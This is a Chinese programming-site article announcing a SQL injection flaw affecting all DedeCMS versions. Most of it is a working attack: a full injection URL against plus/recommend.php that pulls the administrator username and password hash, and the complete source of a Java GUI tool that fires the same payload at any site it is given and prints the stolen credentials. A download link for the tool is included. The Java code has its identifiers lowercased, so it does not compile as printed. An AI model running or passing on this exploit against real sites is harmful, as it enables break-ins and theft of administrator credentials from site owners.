欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  网络运营

DedeCMS全版本通杀SQL注入漏洞利用代码及工具2014年2月28日

程序员文章站 2022-07-10 10:08:39
近日,网友在dedecms中发现了全版本通杀的SQL注入漏洞,目前官方最新版已修复该漏洞,大家早点去官方下载补丁2014年2月28日... 14-02-28...
dedecms即织梦(php开源网站内容管理系统)。织梦内容管理系统(dedecms) 以简单、实用、开源而闻名,是国内最知名的php开源网站管理系统,也是使用用户最多的php类cms系统。

DedeCMS全版本通杀SQL注入漏洞利用代码及工具2014年2月28日



近日,网友在dedecms中发现了全版本通杀的sql注入漏洞,目前官方最新版已修复该漏洞,相关利用代码如下:

exp:


复制代码
代码如下:

http://*.*.com/plus/recommend.php?action=&aid=1&_files[type][tmp_name]=\' or mid=@`\'` /*!50000union*//*!50000select*/1,2,3,(select concat(0x7c,userid,0x7c,pwd)+from+`%23@__admin` limit+0,1),5,6,7,8,9%23@`\'`+&_files[type][name]=1.jpg&_files[type][type]=application/octet-stream&_files[type][size]=111


直接获取就可以得到管理员的用户名与加密后的密码,效果如下图所示

DedeCMS全版本通杀SQL注入漏洞利用代码及工具2014年2月28日



利用工具源码(by 园长):


复制代码
代码如下:

package org.javaweb.dede.ui;

import java.awt.toolkit;
import java.io.bufferedreader;
import java.io.inputstreamreader;
import java.net.url;
import java.util.regex.matcher;
import java.util.regex.pattern;

/**
*
* @author yz
*/
public class mainframe extends javax.swing.jframe {

private static final long serialversionuid = 1l;

/**
* creates new form mainframe
*/
public mainframe() {
initcomponents();
}

public string request(string url){
string str = "",tmp;
try {
bufferedreader br = new bufferedreader(new inputstreamreader(new url(url).openstream()));
while((tmp=br.readline())!=null){
str+=tmp+"\r\n";
}
} catch (exception e) {
jtextarea1.settext(e.tostring());
}
return str;
}

private void initcomponents() {

jpanel1 = new javax.swing.jpanel();
jlabel1 = new javax.swing.jlabel();
jtextfield1 = new javax.swing.jtextfield();
jbutton1 = new javax.swing.jbutton();
jscrollpane1 = new javax.swing.jscrollpane();
jtextarea1 = new javax.swing.jtextarea();

setdefaultcloseoperation(javax.swing.windowconstants.exit_on_close);

jlabel1.settext("url:");
jtextfield1.settext("<a href="http://localhost">http://localhost</a>");

this.settitle("dedecms recommend.php注入利用工具-p2j.cn");

int screenwidth = toolkit.getdefaulttoolkit().getscreensize().width;
int screenheight = toolkit.getdefaulttoolkit().getscreensize().height;
this.setbounds(screenwidth / 2 - 229, screenheight / 2 - 158, 458, 316);

jbutton1.settext("获取");
jbutton1.addactionlistener(new java.awt.event.actionlistener() {
public void actionperformed(java.awt.event.actionevent evt) {
jbutton1actionperformed(evt);
}
});

jtextarea1.setcolumns(20);
jtextarea1.setrows(5);
jscrollpane1.setviewportview(jtextarea1);

javax.swing.grouplayout jpanel1layout = new javax.swing.grouplayout(jpanel1);
jpanel1.setlayout(jpanel1layout);
jpanel1layout.sethorizontalgroup(
jpanel1layout.createparallelgroup(javax.swing.grouplayout.alignment.leading)
.addgroup(jpanel1layout.createsequentialgroup()
.addgroup(jpanel1layout.createparallelgroup(javax.swing.grouplayout.alignment.trailing, false)
.addcomponent(jscrollpane1, javax.swing.grouplayout.alignment.leading)
.addgroup(javax.swing.grouplayout.alignment.leading, jpanel1layout.createsequentialgroup()
.addcontainergap()
.addcomponent(jlabel1)
.addpreferredgap(javax.swing.layoutstyle.componentplacement.related)
.addcomponent(jtextfield1, javax.swing.grouplayout.preferred_size, 331, javax.swing.grouplayout.preferred_size)
.addpreferredgap(javax.swing.layoutstyle.componentplacement.related)
.addcomponent(jbutton1, javax.swing.grouplayout.preferred_size, 83, javax.swing.grouplayout.preferred_size)))
.addgap(0, 0, short.max_value))
);
jpanel1layout.setverticalgroup(
jpanel1layout.createparallelgroup(javax.swing.grouplayout.alignment.leading)
.addgroup(jpanel1layout.createsequentialgroup()
.addcontainergap()
.addgroup(jpanel1layout.createparallelgroup(javax.swing.grouplayout.alignment.baseline)
.addcomponent(jlabel1)
.addcomponent(jtextfield1,
javax.swing.grouplayout.preferred_size,
javax.swing.grouplayout.default_size,
javax.swing.grouplayout.preferred_size)
.addcomponent(jbutton1))
.addpreferredgap(javax.swing.layoutstyle.componentplacement.related)
.addcomponent(jscrollpane1, javax.swing.grouplayout.default_size, 254, short.max_value))
);

javax.swing.grouplayout layout = new javax.swing.grouplayout(getcontentpane());
getcontentpane().setlayout(layout);
layout.sethorizontalgroup(
layout.createparallelgroup(javax.swing.grouplayout.alignment.leading)
.addcomponent(jpanel1, javax.swing.grouplayout.default_size, javax.swing.grouplayout.default_size, short.max_value)
);
layout.setverticalgroup(
layout.createparallelgroup(javax.swing.grouplayout.alignment.leading)
.addcomponent(jpanel1, javax.swing.grouplayout.default_size, javax.swing.grouplayout.default_size, short.max_value)
);

pack();
}// </editor-fold>

private void jbutton1actionperformed(java.awt.event.actionevent evt) {
string url = jtextfield1.gettext();
if(null==url||"".equals(url)){
return ;
}
string result = request(url+"/plus/recommend.php?action=&aid=1&_files[type][tmp_name]=\\%27%20or%20mid=@`\\%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20concat(0x7c,userid,0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8,9%23@`\\%27`+&_files[type][name]=1.jpg&_files[type][type]=application/octet-stream&_files[type][size]=4294");
matcher m = pattern.compile("<h2>(.*)</h2>").matcher(result);
if(m.find()){
string[] s = m.group(1).split("\\|");
if(s.length>2){
jtextarea1.settext("username:"+s[1]+"\r\nmd5:"+s[2].substring(3,s[2].length()-1));
}
}
}

public static void main(string args[]) {
java.awt.eventqueue.invokelater(new runnable() {
public void run() {
new mainframe().setvisible(true);
}
});
}

// variables declaration - do not modify
private javax.swing.jbutton jbutton1;
private javax.swing.jlabel jlabel1;
private javax.swing.jpanel jpanel1;
private javax.swing.jscrollpane jscrollpane1;
private javax.swing.jtextarea jtextarea1;
private javax.swing.jtextfield jtextfield1;
// end of variables declaration
}


利用工具下载地址 http://pan.baidu.com/s/1i37lunf (本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!)

DedeCMS全版本通杀SQL注入漏洞利用代码及工具2014年2月28日

dedecms官方补丁地址:
相关标签: dedecms SQL注入